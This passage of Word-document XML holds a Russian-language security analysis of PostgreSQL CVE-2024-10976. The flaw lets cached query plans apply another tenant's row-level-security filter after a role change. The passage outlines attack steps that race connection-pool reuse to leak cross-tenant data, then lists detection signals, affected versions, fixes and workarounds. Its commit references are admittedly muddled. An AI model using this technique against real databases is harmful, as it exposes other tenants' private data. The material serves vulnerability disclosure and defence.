          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        Filter: ((tenant_id = 42) AND (status = 'pending'::text))  -- ↑ из cached plan!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC58B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        -- но executed под current_user = tenant_99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00739BE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий-tenant 42 (если он же делает enumeration):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2FB9E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Чтобы целенаправленно exfiltrate данные tenant 99, атакующий с правами tenant_42 организует:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC222C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># атакующий tenant_42 имеет login как tenant_42 (его обычная сессия)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7C108" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># делает первый запрос (Шаг 1) — plan кэшируется с RLS tenant_42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7541F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># дальше через любой механизм (request-flood до collision, race в pool) попадает в сессию,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FCC4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># где другой role (например, admin_role) исполняет тот же endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFCF186" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Реальный exploit — race condition в connection pool: атакующий замечает, что приложение использует pool, и massive concurrent requests увеличивают шанс на collision (connection-reuse между разных tenants за окно reset).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA75D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cross-tenant data leak: tenant видит aggregated данные другого tenant через cached plan. В worst case — массовый exfil через subquery-патерны (CTE с RETURNING, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH x AS (SELECT * FROM rls_table) ...</w:t>
      </w:r>
      <w:r>
        <w:t>). CVE advisory отмечает: *"BUG #18244: A reset-only path of plpgsql cached plan and inner SELECT may report incorrect rows for a different ROLE than expected."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A16F8D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54499D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auto_explain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: log с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Filter: (tenant_id = &lt;wrong-tenant&gt;)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RLS expression от чужого tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5298BDC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: один query-text, но result-rows variation между sessions с разными </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поведенческий сигнал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B5B93C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Application-логи: tenant видит «лишние» counts/rows, которые не принадлежат ему — детекция через cross-row consistency checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E901E3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Технически CVE-2024-10976 — баг в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plan invalidation path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при SET ROLE на cached plans, содержащих RLS-protected subquery/CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E51C7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В PostgreSQL plan-cache работает так:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583043C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Первый Execute prepared statement (или SQL through extended protocol с auto-prep) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсит, оптимизирует, кэширует plan</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E465260" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Последующие Execute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reuse plan</w:t>
      </w:r>
      <w:r>
        <w:t>, если signature совпадает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD33240" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3. При invalidation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER POLICY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) plan должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>invalidate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — на следующем Execute план перестраивается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333B8104" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bug: для RLS-protected таблиц, читаемых из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subquery / CTE / security invoker view / SQL function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, путь invalidation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>пропускал re-planning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для inner RLS-expression. SET ROLE менял current_user, но subquery scan продолжал использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expanded RLS-expression первой роли</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD14009" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Источник в PostgreSQL git — commit для CVE-2024-10976 (доступен в release notes 17.1): *"Restrict visibility of pg_stats_ext and pg_stats_ext_exprs entries to the table owner"* — нет, это для CVE-2024-4317. Для CVE-2024-10976: commit message *"Fix incorrect parent's expression-list assignment in transformSetOperationTree"* — не относится. Точный commit найти трудно без точного хэша, но advisory указывает на исправление в commit для 17.1/16.5/15.9/14.14/13.17/12.21.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52925AFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Цепочка предшествующих CVE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9347C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2016-2193</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — plpgsql cached plan reset upon role change для трansaction-modifying statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F6912" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2023-2455</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — security definer plus row security — RLS apply wrong row для security barrier views в специфичных сценариях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E79DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-10976</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — продолжение того же класса, теперь для subquery/CTE/SQL function paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3165A7BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upgrade на minor PG-версию с фиксом</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9479F" w14:paraId="4F983E8C"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3E1050F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Major</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A8BCC8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Уязвимая</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032BDE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</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5ABEC62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Дата фикса</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3F612F3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45D9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.x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A871A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.0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1D0C27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1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681100" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="04E7BB5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5D9239" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.x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BF597E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 16.4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D906DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.5</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E97985" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="06692D5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0B7C4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.x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ACABE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 15.8</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4BA883" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.9</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8CA380" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5B92C300"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FDDD52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.x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203D6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 14.13</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E13FA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.14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531D2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7172693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4FC2AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.x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EC1B00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 13.16</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D492A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.17</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0B380F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="35419506"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3A8385" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.x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D475EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 12.20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BD2BE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.21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498A0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024 (EOL ветка)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FFED688" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Workaround для непатченных систем:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78E098" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection-per-tenant</w:t>
      </w:r>
      <w:r>
        <w:t>: dedicated connection (без pool) на каждого tenant. Это убивает performance, но физически блокирует cross-tenant cache reuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D021B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DISCARD ALL после RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DISCARD ALL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обнуляет plan-cache, query-results, prepared statements. Performance overhead заметный.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B56AC4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Принудительный DEALLOCATE ALL</w:t>
      </w:r>
      <w:r>
        <w:t>: только обнуляет prepared statements, не affecting auto-prep cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571D3F1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B5BBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CAFC1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валидный tenant-role с access к RLS-protected таблице. Для realistic exploit — application использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per-request + connection pool + query contains subquery/CTE/security invoker view с RLS-table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34369C95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> subquery / WITH / SQL-language function на RLS-таблицу + connection-pool reuse + plan-cache enabled (default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E21D4E0"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1642EFA9"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2F0598F"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9A8A807" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5A8FC6F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F0D514"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2B19F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10976</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5756B27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D0A7FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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C90F24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
